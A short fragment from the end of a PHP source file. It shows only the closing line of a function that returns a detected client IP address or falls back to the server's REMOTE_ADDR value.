1283 | 	return ($ip ? $ip : $_SERVER['REMOTE_ADDR']);}
1284 |  
1285 | //file end
1286 | 


--------------------------------------------------------------------------------